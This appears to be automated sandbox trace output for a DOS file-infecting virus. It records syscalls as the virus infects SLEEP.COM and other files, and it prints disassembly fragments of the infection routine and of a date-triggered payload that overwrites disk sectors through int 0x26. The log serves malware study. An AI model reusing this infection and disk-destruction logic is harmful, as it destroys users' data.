2018-12-25T12:43:39.945832549Z 44 PC: 12c04 | Get time (See above)
2018-12-25T12:43:39.949045361Z 64 PC: 12e27 | Write file or device (See above)
2018-12-25T12:43:39.95781514Z 87 PC: 12c25 | Get or set file date and time (See above)
2018-12-25T12:43:39.95921631Z 62 PC: 12c29 | Close file (See above)
2018-12-25T12:43:39.967447264Z 67 PC: 12cda | Get or set file attributes (See above)
2018-12-25T12:43:39.973673503Z 79 PC: 12b01 | Find next file (See above)
2018-12-25T12:43:39.975505935Z 61 PC: 12ccf | Open file (See above)
2018-12-25T12:43:39.979715743Z 63 PC: 12b1c | Read file or device (See above)
2018-12-25T12:43:39.985375272Z 62 PC: 12b20 | Close file (See above)
2018-12-25T12:43:39.987313868Z 79 PC: 12b01 | Find next file (See above)
2018-12-25T12:43:39.989640072Z 59 PC: 12aad | Change current directory
2018-12-25T12:43:39.994186462Z 42 PC: 12c38 | Get date 0x12c38: cmp dh, 4
0x12c3b: jne 0x12cb8
0x12c3d: cmp dl, 7
0x12c40: jb 0x12cb8
0x12c42: mov ah, 9
0x12c44: lea dx, word ptr [bp + 0x3ab]
0x12c48: int 0x21
0x12c4a: mov al, 2
0x12c4c: mov cx, 0xff
0x12c4f: mov dx, 0
0x12c52: int 0x26
0x12c54: mov al, 3
0x12c56: mov cx, 0xff
0x12c59: mov dx, 0
0x12c5c: int 0x26
0x12c5e: mov al, 4
0x12c60: mov cx, 0xff
0x12c63: mov dx, 0
0x12c66: int 0x26
0x12c68: mov al, 5
2018-12-25T12:43:39.996763805Z 59 PC: 12aba | Change current directory
2018-12-25T12:43:39.998449211Z 26 PC: 12cc6 | Set disk transfer address (See above)

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":true,"OriginalID":15498,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:43:40.101216143Z 26 PC: 12cc6 | Set disk transfer address
2018-12-25T12:43:40.102361433Z 71 PC: 12a97 | Get current directory
2018-12-25T12:43:40.106469484Z 78 PC: 12b01 | Find first file
2018-12-25T12:43:40.125538759Z 78 PC: 12b01 | Find first file (See above)
2018-12-25T12:43:40.132750216Z 61 PC: 12ccf | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:43:40.141567168Z 63 PC: 12b1c | Read file or device (Read 26 bytes on handle 5)
2018-12-25T12:43:40.148549904Z 62 PC: 12b20 | Close file
2018-12-25T12:43:40.150454993Z 67 PC: 12cda | Get or set file attributes
2018-12-25T12:43:40.171827264Z 61 PC: 12ccf | Open file (See above)
2018-12-25T12:43:40.179857812Z 64 PC: 12bf9 | Write file or device (Write 5 bytes on handle 5)
2018-12-25T12:43:40.187269583Z 66 PC: 12cc1 | Move file pointer
2018-12-25T12:43:40.204032935Z 44 PC: 12c04 | Get time 0x12c04: cmp dh, 0
0x12c07: je 0x12c00
0x12c09: mov byte ptr cs:[bp + 0x4d2], dh
0x12c0e: call 0x12dce
0x12c11: inc byte ptr cs:[bp + 0x4d3]
0x12c16: mov ax, 0x5701
0x12c19: mov cx, word ptr cs:[bp + 0x546]
0x12c1e: mov dx, word ptr cs:[bp + 0x548]
0x12c23: int 0x21
0x12c25: mov ah, 0x3e
0x12c27: int 0x21
0x12c29: xor cx, cx
0x12c2b: mov cl, byte ptr cs:[bp + 0x545]
0x12c30: call 0x12cd1
0x12c33: ret
0x12c34: mov ah, 0x2a
0x12c36: int 0x21
0x12c38: cmp dh, 4
0x12c3b: jne 0x12cb8
0x12c3d: cmp dl, 7
2018-12-25T12:43:40.206941925Z 64 PC: 12e27 | Write file or device (Write 974 bytes on handle 5)
2018-12-25T12:43:40.216869304Z 87 PC: 12c25 | Get or set file date and time
2018-12-25T12:43:40.218452022Z 62 PC: 12c29 | Close file
2018-12-25T12:43:40.227110914Z 67 PC: 12cda | Get or set file attributes (See above)
2018-12-25T12:43:40.238077021Z 79 PC: 12b01 | Find next file (See above)
2018-12-25T12:43:40.240961909Z 61 PC: 12ccf | Open file (See above)
2018-12-25T12:43:40.257994142Z 63 PC: 12b1c | Read file or device (See above)
2018-12-25T12:43:40.265816106Z 62 PC: 12b20 | Close file (See above)
2018-12-25T12:43:40.267886652Z 67 PC: 12cda | Get or set file attributes (See above)
2018-12-25T12:43:40.279669668Z 61 PC: 12ccf | Open file (See above)
2018-12-25T12:43:40.296620818Z 64 PC: 12bf9 | Write file or device (See above)
2018-12-25T12:43:40.299688068Z 66 PC: 12cc1 | Move file pointer (See above)
2018-12-25T12:43:40.310188477Z 44 PC: 12c04 | Get time (See above)
2018-12-25T12:43:40.313220233Z 64 PC: 12e27 | Write file or device (See above)
2018-12-25T12:43:40.322697332Z 87 PC: 12c25 | Get or set file date and time (See above)
2018-12-25T12:43:40.32457071Z 62 PC: 12c29 | Close file (See above)
2018-12-25T12:43:40.345484436Z 67 PC: 12cda | Get or set file attributes (See above)
2018-12-25T12:43:40.35659599Z 79 PC: 12b01 | Find next file (See above)
2018-12-25T12:43:40.360215404Z 61 PC: 12ccf | Open file (See above)
2018-12-25T12:43:40.377227553Z 63 PC: 12b1c | Read file or device (See above)
2018-12-25T12:43:40.384586728Z 62 PC: 12b20 | Close file (See above)
2018-12-25T12:43:40.387184505Z 67 PC: 12cda | Get or set file attributes (See above)
2018-12-25T12:43:40.399977282Z 61 PC: 12ccf | Open file (See above)
2018-12-25T12:43:40.407837475Z 64 PC: 12bf9 | Write file or device (See above)
2018-12-25T12:43:40.411362691Z 66 PC: 12cc1 | Move file pointer (See above)
2018-12-25T12:43:40.413484486Z 44 PC: 12c04 | Get time (See above)
2018-12-25T12:43:40.417121935Z 64 PC: 12e27 | Write file or device (See above)
2018-12-25T12:43:40.427158213Z 87 PC: 12c25 | Get or set file date and time (See above)
2018-12-25T12:43:40.429332883Z 62 PC: 12c29 | Close file (See above)
2018-12-25T12:43:40.438198646Z 67 PC: 12cda | Get or set file attributes (See above)
2018-12-25T12:43:40.449527235Z 79 PC: 12b01 | Find next file (See above)
2018-12-25T12:43:40.453065486Z 61 PC: 12ccf | Open file (See above)
2018-12-25T12:43:40.461530996Z 63 PC: 12b1c | Read file or device (See above)
2018-12-25T12:43:40.468974098Z 62 PC: 12b20 | Close file (See above)
2018-12-25T12:43:40.471462961Z 67 PC: 12cda | Get or set file attributes (See above)
2018-12-25T12:43:40.48445494Z 61 PC: 12ccf | Open file (See above)
2018-12-25T12:43:40.492924584Z 64 PC: 12bf9 | Write file or device (See above)
2018-12-25T12:43:40.496254577Z 66 PC: 12cc1 | Move file pointer (See above)
2018-12-25T12:43:40.498941369Z 44 PC: 12c04 | Get time (See above)
2018-12-25T12:43:40.502483037Z 64 PC: 12e27 | Write file or device (See above)
2018-12-25T12:43:40.512187531Z 87 PC: 12c25 | Get or set file date and time (See above)
2018-12-25T12:43:40.514554163Z 62 PC: 12c29 | Close file (See above)
2018-12-25T12:43:40.523667595Z 67 PC: 12cda | Get or set file attributes (See above)
2018-12-25T12:43:40.535061898Z 79 PC: 12b01 | Find next file (See above)
2018-12-25T12:43:40.538903715Z 61 PC: 12ccf | Open file (See above)
2018-12-25T12:43:40.54709471Z 63 PC: 12b1c | Read file or device (See above)
2018-12-25T12:43:40.55413354Z 62 PC: 12b20 | Close file (See above)
2018-12-25T12:43:40.55641197Z 67 PC: 12cda | Get or set file attributes (See above)
2018-12-25T12:43:40.562179865Z 61 PC: 12ccf | Open file (See above)
2018-12-25T12:43:40.567526192Z 64 PC: 12bf9 | Write file or device (See above)
2018-12-25T12:43:40.570887303Z 66 PC: 12cc1 | Move file pointer (See above)
2018-12-25T12:43:40.574314354Z 44 PC: 12c04 | Get time (See above)
2018-12-25T12:43:40.57758894Z 64 PC: 12e27 | Write file or device (See above)
2018-12-25T12:43:40.594648834Z 87 PC: 12c25 | Get or set file date and time (See above)
2018-12-25T12:43:40.596930754Z 62 PC: 12c29 | Close file (See above)
2018-12-25T12:43:40.598986775Z 67 PC: 12cda | Get or set file attributes (See above)
2018-12-25T12:43:40.603857825Z 79 PC: 12b01 | Find next file (See above)
2018-12-25T12:43:40.608695812Z 61 PC: 12ccf | Open file (See above)
2018-12-25T12:43:40.616544266Z 63 PC: 12b1c | Read file or device (See above)
2018-12-25T12:43:40.623467113Z 62 PC: 12b20 | Close file (See above)
2018-12-25T12:43:40.626841169Z 67 PC: 12cda | Get or set file attributes (See above)
2018-12-25T12:43:40.639188678Z 61 PC: 12ccf | Open file (See above)
2018-12-25T12:43:40.646573631Z 64 PC: 12bf9 | Write file or device (See above)
2018-12-25T12:43:40.650225583Z 66 PC: 12cc1 | Move file pointer (See above)
2018-12-25T12:43:40.65207553Z 44 PC: 12c04 | Get time (See above)
2018-12-25T12:43:40.654990196Z 64 PC: 12e27 | Write file or device (See above)
2018-12-25T12:43:40.664707761Z 87 PC: 12c25 | Get or set file date and time (See above)
2018-12-25T12:43:40.666659768Z 62 PC: 12c29 | Close file (See above)
2018-12-25T12:43:40.675769594Z 67 PC: 12cda | Get or set file attributes (See above)
2018-12-25T12:43:40.686990545Z 79 PC: 12b01 | Find next file (See above)
2018-12-25T12:43:40.691440744Z 61 PC: 12ccf | Open file (See above)
2018-12-25T12:43:40.699255798Z 63 PC: 12b1c | Read file or device (See above)
2018-12-25T12:43:40.706364367Z 62 PC: 12b20 | Close file (See above)
2018-12-25T12:43:40.709047838Z 67 PC: 12cda | Get or set file attributes (See above)
2018-12-25T12:43:40.720089946Z 61 PC: 12ccf | Open file (See above)
2018-12-25T12:43:40.728176437Z 64 PC: 12bf9 | Write file or device (See above)
2018-12-25T12:43:40.73229229Z 66 PC: 12cc1 | Move file pointer (See above)
2018-12-25T12:43:40.735049543Z 44 PC: 12c04 | Get time (See above)
2018-12-25T12:43:40.738351993Z 64 PC: 12e27 | Write file or device (See above)
2018-12-25T12:43:40.748259137Z 87 PC: 12c25 | Get or set file date and time (See above)
2018-12-25T12:43:40.750749671Z 62 PC: 12c29 | Close file (See above)
2018-12-25T12:43:40.759196185Z 67 PC: 12cda | Get or set file attributes (See above)
2018-12-25T12:43:40.770056712Z 79 PC: 12b01 | Find next file (See above)
2018-12-25T12:43:40.773686202Z 61 PC: 12ccf | Open file (See above)
2018-12-25T12:43:40.781779143Z 63 PC: 12b1c | Read file or device (See above)
2018-12-25T12:43:40.789239228Z 62 PC: 12b20 | Close file (See above)
2018-12-25T12:43:40.792370651Z 79 PC: 12b01 | Find next file (See above)
2018-12-25T12:43:40.795203609Z 59 PC: 12aad | Change current directory
2018-12-25T12:43:40.799921599Z 42 PC: 12c38 | Get date 0x12c38: cmp dh, 4
0x12c3b: jne 0x12cb8
0x12c3d: cmp dl, 7
0x12c40: jb 0x12cb8
0x12c42: mov ah, 9
0x12c44: lea dx, word ptr [bp + 0x3ab]
0x12c48: int 0x21
0x12c4a: mov al, 2
0x12c4c: mov cx, 0xff
0x12c4f: mov dx, 0
0x12c52: int 0x26
0x12c54: mov al, 3
0x12c56: mov cx, 0xff
0x12c59: mov dx, 0
0x12c5c: int 0x26
0x12c5e: mov al, 4
0x12c60: mov cx, 0xff
0x12c63: mov dx, 0
0x12c66: int 0x26
0x12c68: mov al, 5
2018-12-25T12:43:40.803536652Z 59 PC: 12aba | Change current directory
2018-12-25T12:43:40.805616994Z 26 PC: 12cc6 | Set disk transfer address (See above)

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":1,"TimeBased":true,"OriginalID":15498,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:43:40.490613193Z 26 PC: 12cc6 | Set disk transfer address
2018-12-25T12:43:40.492676924Z 71 PC: 12a97 | Get current directory
2018-12-25T12:43:40.495922197Z 78 PC: 12b01 | Find first file
2018-12-25T12:43:40.50242196Z 78 PC: 12b01 | Find first file (See above)
2018-12-25T12:43:40.508814929Z 61 PC: 12ccf | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:43:40.516583437Z 63 PC: 12b1c | Read file or device (Read 26 bytes on handle 5)
2018-12-25T12:43:40.523957123Z 62 PC: 12b20 | Close file
2018-12-25T12:43:40.525867466Z 67 PC: 12cda | Get or set file attributes
2018-12-25T12:43:40.546778469Z 61 PC: 12ccf | Open file (See above)
2018-12-25T12:43:40.553929609Z 64 PC: 12bf9 | Write file or device (Write 5 bytes on handle 5)
2018-12-25T12:43:40.561665447Z 66 PC: 12cc1 | Move file pointer
2018-12-25T12:43:40.564295491Z 44 PC: 12c04 | Get time 0x12c04: cmp dh, 0
0x12c07: je 0x12c00
0x12c09: mov byte ptr cs:[bp + 0x4d2], dh
0x12c0e: call 0x12dce
0x12c11: inc byte ptr cs:[bp + 0x4d3]
0x12c16: mov ax, 0x5701
0x12c19: mov cx, word ptr cs:[bp + 0x546]
0x12c1e: mov dx, word ptr cs:[bp + 0x548]
0x12c23: int 0x21
0x12c25: mov ah, 0x3e
0x12c27: int 0x21
0x12c29: xor cx, cx
0x12c2b: mov cl, byte ptr cs:[bp + 0x545]
0x12c30: call 0x12cd1
0x12c33: ret
0x12c34: mov ah, 0x2a
0x12c36: int 0x21
0x12c38: cmp dh, 4
0x12c3b: jne 0x12cb8
0x12c3d: cmp dl, 7
2018-12-25T12:43:40.567572028Z 64 PC: 12e27 | Write file or device (Write 974 bytes on handle 5)
2018-12-25T12:43:40.57777111Z 87 PC: 12c25 | Get or set file date and time
2018-12-25T12:43:40.579865241Z 62 PC: 12c29 | Close file
2018-12-25T12:43:40.588879743Z 67 PC: 12cda | Get or set file attributes (See above)
2018-12-25T12:43:40.601760727Z 79 PC: 12b01 | Find next file (See above)
2018-12-25T12:43:40.605147668Z 61 PC: 12ccf | Open file (See above)
2018-12-25T12:43:40.614582964Z 63 PC: 12b1c | Read file or device (See above)
2018-12-25T12:43:40.622194132Z 62 PC: 12b20 | Close file (See above)
2018-12-25T12:43:40.625359473Z 67 PC: 12cda | Get or set file attributes (See above)
2018-12-25T12:43:40.637061663Z 61 PC: 12ccf | Open file (See above)
2018-12-25T12:43:40.64479575Z 64 PC: 12bf9 | Write file or device (See above)
2018-12-25T12:43:40.64836097Z 66 PC: 12cc1 | Move file pointer (See above)
2018-12-25T12:43:40.650552159Z 44 PC: 12c04 | Get time (See above)
2018-12-25T12:43:40.653907866Z 64 PC: 12e27 | Write file or device (See above)
2018-12-25T12:43:40.663727315Z 87 PC: 12c25 | Get or set file date and time (See above)
2018-12-25T12:43:40.666526495Z 62 PC: 12c29 | Close file (See above)
2018-12-25T12:43:40.675675622Z 67 PC: 12cda | Get or set file attributes (See above)
2018-12-25T12:43:40.684083352Z 79 PC: 12b01 | Find next file (See above)
2018-12-25T12:43:40.68689053Z 61 PC: 12ccf | Open file (See above)
2018-12-25T12:43:40.691152606Z 63 PC: 12b1c | Read file or device (See above)
2018-12-25T12:43:40.695412961Z 62 PC: 12b20 | Close file (See above)
2018-12-25T12:43:40.697810541Z 67 PC: 12cda | Get or set file attributes (See above)
2018-12-25T12:43:40.708763365Z 61 PC: 12ccf | Open file (See above)
2018-12-25T12:43:40.715692937Z 64 PC: 12bf9 | Write file or device (See above)
2018-12-25T12:43:40.718815936Z 66 PC: 12cc1 | Move file pointer (See above)
2018-12-25T12:43:40.720240655Z 44 PC: 12c04 | Get time (See above)
2018-12-25T12:43:40.722804983Z 64 PC: 12e27 | Write file or device (See above)
2018-12-25T12:43:40.733253321Z 87 PC: 12c25 | Get or set file date and time (See above)
2018-12-25T12:43:40.734781347Z 62 PC: 12c29 | Close file (See above)
2018-12-25T12:43:40.742911439Z 67 PC: 12cda | Get or set file attributes (See above)
2018-12-25T12:43:40.75353315Z 79 PC: 12b01 | Find next file (See above)
2018-12-25T12:43:40.756471727Z 61 PC: 12ccf | Open file (See above)
2018-12-25T12:43:40.763562787Z 63 PC: 12b1c | Read file or device (See above)
2018-12-25T12:43:40.770371254Z 62 PC: 12b20 | Close file (See above)
2018-12-25T12:43:40.772432058Z 67 PC: 12cda | Get or set file attributes (See above)
2018-12-25T12:43:40.783197253Z 61 PC: 12ccf | Open file (See above)
2018-12-25T12:43:40.796162829Z 64 PC: 12bf9 | Write file or device (See above)
2018-12-25T12:43:40.804010297Z 66 PC: 12cc1 | Move file pointer (See above)
2018-12-25T12:43:40.805736899Z 44 PC: 12c04 | Get time (See above)
2018-12-25T12:43:40.809013157Z 64 PC: 12e27 | Write file or device (See above)
2018-12-25T12:43:40.818965194Z 87 PC: 12c25 | Get or set file date and time (See above)
2018-12-25T12:43:40.820627834Z 62 PC: 12c29 | Close file (See above)
2018-12-25T12:43:40.829014467Z 67 PC: 12cda | Get or set file attributes (See above)
2018-12-25T12:43:40.840530162Z 79 PC: 12b01 | Find next file (See above)
2018-12-25T12:43:40.843364029Z 61 PC: 12ccf | Open file (See above)
2018-12-25T12:43:40.850540854Z 63 PC: 12b1c | Read file or device (See above)
2018-12-25T12:43:40.858671547Z 62 PC: 12b20 | Close file (See above)
2018-12-25T12:43:40.860587247Z 67 PC: 12cda | Get or set file attributes (See above)
2018-12-25T12:43:40.866250659Z 61 PC: 12ccf | Open file (See above)
2018-12-25T12:43:40.880119923Z 64 PC: 12bf9 | Write file or device (See above)
2018-12-25T12:43:40.883093892Z 66 PC: 12cc1 | Move file pointer (See above)
2018-12-25T12:43:40.884637513Z 44 PC: 12c04 | Get time (See above)
2018-12-25T12:43:40.887635112Z 64 PC: 12e27 | Write file or device (See above)
2018-12-25T12:43:40.907235165Z 87 PC: 12c25 | Get or set file date and time (See above)
2018-12-25T12:43:40.909090344Z 62 PC: 12c29 | Close file (See above)
2018-12-25T12:43:40.910918275Z 67 PC: 12cda | Get or set file attributes (See above)
2018-12-25T12:43:40.916192117Z 79 PC: 12b01 | Find next file (See above)
2018-12-25T12:43:40.918964843Z 61 PC: 12ccf | Open file (See above)
2018-12-25T12:43:40.926928551Z 63 PC: 12b1c | Read file or device (See above)
2018-12-25T12:43:40.93539182Z 62 PC: 12b20 | Close file (See above)
2018-12-25T12:43:40.937889836Z 67 PC: 12cda | Get or set file attributes (See above)
2018-12-25T12:43:40.950267069Z 61 PC: 12ccf | Open file (See above)
2018-12-25T12:43:40.958526786Z 64 PC: 12bf9 | Write file or device (See above)
2018-12-25T12:43:40.9617998Z 66 PC: 12cc1 | Move file pointer (See above)
2018-12-25T12:43:40.963369154Z 44 PC: 12c04 | Get time (See above)
2018-12-25T12:43:40.967004203Z 64 PC: 12e27 | Write file or device (See above)
2018-12-25T12:43:40.977428565Z 87 PC: 12c25 | Get or set file date and time (See above)
2018-12-25T12:43:40.979429769Z 62 PC: 12c29 | Close file (See above)
2018-12-25T12:43:40.989805416Z 67 PC: 12cda | Get or set file attributes (See above)
2018-12-25T12:43:41.001203649Z 79 PC: 12b01 | Find next file (See above)
2018-12-25T12:43:41.004072695Z 61 PC: 12ccf | Open file (See above)
2018-12-25T12:43:41.011260778Z 63 PC: 12b1c | Read file or device (See above)
2018-12-25T12:43:41.018833262Z 62 PC: 12b20 | Close file (See above)
2018-12-25T12:43:41.020810161Z 67 PC: 12cda | Get or set file attributes (See above)
2018-12-25T12:43:41.04602122Z 61 PC: 12ccf | Open file (See above)
2018-12-25T12:43:41.055109866Z 64 PC: 12bf9 | Write file or device (See above)
2018-12-25T12:43:41.05801356Z 66 PC: 12cc1 | Move file pointer (See above)
2018-12-25T12:43:41.059399217Z 44 PC: 12c04 | Get time (See above)
2018-12-25T12:43:41.062981272Z 64 PC: 12e27 | Write file or device (See above)
2018-12-25T12:43:41.072395316Z 87 PC: 12c25 | Get or set file date and time (See above)
2018-12-25T12:43:41.074567475Z 62 PC: 12c29 | Close file (See above)
2018-12-25T12:43:41.084118004Z 67 PC: 12cda | Get or set file attributes (See above)
2018-12-25T12:43:41.096276548Z 79 PC: 12b01 | Find next file (See above)
2018-12-25T12:43:41.099109229Z 61 PC: 12ccf | Open file (See above)
2018-12-25T12:43:41.107475413Z 63 PC: 12b1c | Read file or device (See above)
2018-12-25T12:43:41.114881971Z 62 PC: 12b20 | Close file (See above)
2018-12-25T12:43:41.117101461Z 79 PC: 12b01 | Find next file (See above)
2018-12-25T12:43:41.120725041Z 59 PC: 12aad | Change current directory
2018-12-25T12:43:41.125436278Z 42 PC: 12c38 | Get date 0x12c38: cmp dh, 4
0x12c3b: jne 0x12cb8
0x12c3d: cmp dl, 7
0x12c40: jb 0x12cb8
0x12c42: mov ah, 9
0x12c44: lea dx, word ptr [bp + 0x3ab]
0x12c48: int 0x21
0x12c4a: mov al, 2
0x12c4c: mov cx, 0xff
0x12c4f: mov dx, 0
0x12c52: int 0x26
0x12c54: mov al, 3
0x12c56: mov cx, 0xff
0x12c59: mov dx, 0
0x12c5c: int 0x26
0x12c5e: mov al, 4
0x12c60: mov cx, 0xff
0x12c63: mov dx, 0
0x12c66: int 0x26
0x12c68: mov al, 5
2018-12-25T12:43:41.127701519Z 59 PC: 12aba | Change current directory
2018-12-25T12:43:41.129720274Z 26 PC: 12cc6 | Set disk transfer address (See above)

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":1,"TimeBased":true,"OriginalID":15498,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:43:41.282710702Z 26 PC: 12cc6 | Set disk transfer address
2018-12-25T12:43:41.284529418Z 71 PC: 12a97 | Get current directory
2018-12-25T12:43:41.286675741Z 78 PC: 12b01 | Find first file
2018-12-25T12:43:41.290962913Z 78 PC: 12b01 | Find first file (See above)
2018-12-25T12:43:41.298261208Z 61 PC: 12ccf | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:43:41.310817606Z 63 PC: 12b1c | Read file or device (Read 26 bytes on handle 5)
2018-12-25T12:43:41.317686064Z 62 PC: 12b20 | Close file
2018-12-25T12:43:41.320696261Z 67 PC: 12cda | Get or set file attributes
2018-12-25T12:43:41.337035271Z 61 PC: 12ccf | Open file (See above)
2018-12-25T12:43:41.344071521Z 64 PC: 12bf9 | Write file or device (Write 5 bytes on handle 5)
2018-12-25T12:43:41.348039169Z 66 PC: 12cc1 | Move file pointer
2018-12-25T12:43:41.349941228Z 44 PC: 12c04 | Get time 0x12c04: cmp dh, 0
0x12c07: je 0x12c00
0x12c09: mov byte ptr cs:[bp + 0x4d2], dh
0x12c0e: call 0x12dce
0x12c11: inc byte ptr cs:[bp + 0x4d3]
0x12c16: mov ax, 0x5701
0x12c19: mov cx, word ptr cs:[bp + 0x546]
0x12c1e: mov dx, word ptr cs:[bp + 0x548]
0x12c23: int 0x21
0x12c25: mov ah, 0x3e
0x12c27: int 0x21
0x12c29: xor cx, cx
0x12c2b: mov cl, byte ptr cs:[bp + 0x545]
0x12c30: call 0x12cd1
0x12c33: ret
0x12c34: mov ah, 0x2a
0x12c36: int 0x21
0x12c38: cmp dh, 4
0x12c3b: jne 0x12cb8
0x12c3d: cmp dl, 7
2018-12-25T12:43:41.352812777Z 64 PC: 12e27 | Write file or device (Write 974 bytes on handle 5)
2018-12-25T12:43:41.36187747Z 87 PC: 12c25 | Get or set file date and time
2018-12-25T12:43:41.364500283Z 62 PC: 12c29 | Close file
2018-12-25T12:43:41.372143696Z 67 PC: 12cda | Get or set file attributes (See above)
2018-12-25T12:43:41.382015126Z 79 PC: 12b01 | Find next file (See above)
2018-12-25T12:43:41.385516623Z 61 PC: 12ccf | Open file (See above)
2018-12-25T12:43:41.392752815Z 63 PC: 12b1c | Read file or device (See above)
2018-12-25T12:43:41.399221091Z 62 PC: 12b20 | Close file (See above)
2018-12-25T12:43:41.411853246Z 67 PC: 12cda | Get or set file attributes (See above)
2018-12-25T12:43:41.421774113Z 61 PC: 12ccf | Open file (See above)
2018-12-25T12:43:41.428480491Z 64 PC: 12bf9 | Write file or device (See above)
2018-12-25T12:43:41.432148929Z 66 PC: 12cc1 | Move file pointer (See above)
2018-12-25T12:43:41.43377716Z 44 PC: 12c04 | Get time (See above)
2018-12-25T12:43:41.43657983Z 64 PC: 12e27 | Write file or device (See above)
2018-12-25T12:43:41.446106794Z 87 PC: 12c25 | Get or set file date and time (See above)
2018-12-25T12:43:41.447830831Z 62 PC: 12c29 | Close file (See above)
2018-12-25T12:43:41.455443385Z 67 PC: 12cda | Get or set file attributes (See above)
2018-12-25T12:43:41.466605218Z 79 PC: 12b01 | Find next file (See above)
2018-12-25T12:43:41.469901708Z 61 PC: 12ccf | Open file (See above)
2018-12-25T12:43:41.476507164Z 63 PC: 12b1c | Read file or device (See above)
2018-12-25T12:43:41.48876549Z 62 PC: 12b20 | Close file (See above)
2018-12-25T12:43:41.49068315Z 67 PC: 12cda | Get or set file attributes (See above)
2018-12-25T12:43:41.500535857Z 61 PC: 12ccf | Open file (See above)
2018-12-25T12:43:41.5073054Z 64 PC: 12bf9 | Write file or device (See above)
2018-12-25T12:43:41.510784832Z 66 PC: 12cc1 | Move file pointer (See above)
2018-12-25T12:43:41.51215843Z 44 PC: 12c04 | Get time (See above)
2018-12-25T12:43:41.514719361Z 64 PC: 12e27 | Write file or device (See above)
2018-12-25T12:43:41.521583742Z 87 PC: 12c25 | Get or set file date and time (See above)
2018-12-25T12:43:41.522590066Z 62 PC: 12c29 | Close file (See above)
2018-12-25T12:43:41.527634928Z 67 PC: 12cda | Get or set file attributes (See above)
2018-12-25T12:43:41.534224489Z 79 PC: 12b01 | Find next file (See above)
2018-12-25T12:43:41.536025915Z 61 PC: 12ccf | Open file (See above)
2018-12-25T12:43:41.539981522Z 63 PC: 12b1c | Read file or device (See above)
2018-12-25T12:43:41.544462422Z 62 PC: 12b20 | Close file (See above)
2018-12-25T12:43:41.545835776Z 67 PC: 12cda | Get or set file attributes (See above)
2018-12-25T12:43:41.552079265Z 61 PC: 12ccf | Open file (See above)
2018-12-25T12:43:41.558410593Z 64 PC: 12bf9 | Write file or device (See above)
2018-12-25T12:43:41.561572919Z 66 PC: 12cc1 | Move file pointer (See above)
2018-12-25T12:43:41.563285822Z 44 PC: 12c04 | Get time (See above)
2018-12-25T12:43:41.566764641Z 64 PC: 12e27 | Write file or device (See above)
2018-12-25T12:43:41.5754045Z 87 PC: 12c25 | Get or set file date and time (See above)
2018-12-25T12:43:41.576835177Z 62 PC: 12c29 | Close file (See above)
2018-12-25T12:43:41.584726816Z 67 PC: 12cda | Get or set file attributes (See above)
2018-12-25T12:43:41.597538121Z 79 PC: 12b01 | Find next file (See above)
2018-12-25T12:43:41.600189678Z 61 PC: 12ccf | Open file (See above)
2018-12-25T12:43:41.606703607Z 63 PC: 12b1c | Read file or device (See above)
2018-12-25T12:43:41.613478646Z 62 PC: 12b20 | Close file (See above)
2018-12-25T12:43:41.615983465Z 67 PC: 12cda | Get or set file attributes (See above)
2018-12-25T12:43:41.620286565Z 61 PC: 12ccf | Open file (See above)
2018-12-25T12:43:41.625910648Z 64 PC: 12bf9 | Write file or device (See above)
2018-12-25T12:43:41.628785172Z 66 PC: 12cc1 | Move file pointer (See above)
2018-12-25T12:43:41.630376363Z 44 PC: 12c04 | Get time (See above)
2018-12-25T12:43:41.634277128Z 64 PC: 12e27 | Write file or device (See above)
2018-12-25T12:43:41.650540913Z 87 PC: 12c25 | Get or set file date and time (See above)
2018-12-25T12:43:41.651867637Z 62 PC: 12c29 | Close file (See above)
2018-12-25T12:43:41.654310338Z 67 PC: 12cda | Get or set file attributes (See above)
2018-12-25T12:43:41.659250885Z 79 PC: 12b01 | Find next file (See above)
2018-12-25T12:43:41.661841746Z 61 PC: 12ccf | Open file (See above)
2018-12-25T12:43:41.669130592Z 63 PC: 12b1c | Read file or device (See above)
2018-12-25T12:43:41.675252609Z 62 PC: 12b20 | Close file (See above)
2018-12-25T12:43:41.676963046Z 67 PC: 12cda | Get or set file attributes (See above)
2018-12-25T12:43:41.692249441Z 61 PC: 12ccf | Open file (See above)
2018-12-25T12:43:41.698937918Z 64 PC: 12bf9 | Write file or device (See above)
2018-12-25T12:43:41.701781565Z 66 PC: 12cc1 | Move file pointer (See above)
2018-12-25T12:43:41.704156835Z 44 PC: 12c04 | Get time (See above)
2018-12-25T12:43:41.707561235Z 64 PC: 12e27 | Write file or device (See above)
2018-12-25T12:43:41.716790375Z 87 PC: 12c25 | Get or set file date and time (See above)
2018-12-25T12:43:41.719308551Z 62 PC: 12c29 | Close file (See above)
2018-12-25T12:43:41.72735042Z 67 PC: 12cda | Get or set file attributes (See above)
2018-12-25T12:43:41.73720645Z 79 PC: 12b01 | Find next file (See above)
2018-12-25T12:43:41.740824065Z 61 PC: 12ccf | Open file (See above)
2018-12-25T12:43:41.747537161Z 63 PC: 12b1c | Read file or device (See above)
2018-12-25T12:43:41.753999621Z 62 PC: 12b20 | Close file (See above)
2018-12-25T12:43:41.756840686Z 67 PC: 12cda | Get or set file attributes (See above)
2018-12-25T12:43:41.76701826Z 61 PC: 12ccf | Open file (See above)
2018-12-25T12:43:41.774364482Z 64 PC: 12bf9 | Write file or device (See above)
2018-12-25T12:43:41.778264272Z 66 PC: 12cc1 | Move file pointer (See above)
2018-12-25T12:43:41.780486135Z 44 PC: 12c04 | Get time (See above)
2018-12-25T12:43:41.783369528Z 64 PC: 12e27 | Write file or device (See above)
2018-12-25T12:43:41.793174945Z 87 PC: 12c25 | Get or set file date and time (See above)
2018-12-25T12:43:41.795362596Z 62 PC: 12c29 | Close file (See above)
2018-12-25T12:43:41.802799454Z 67 PC: 12cda | Get or set file attributes (See above)
2018-12-25T12:43:41.812747577Z 79 PC: 12b01 | Find next file (See above)
2018-12-25T12:43:41.815873909Z 61 PC: 12ccf | Open file (See above)
2018-12-25T12:43:41.823405819Z 63 PC: 12b1c | Read file or device (See above)
2018-12-25T12:43:41.830381748Z 62 PC: 12b20 | Close file (See above)
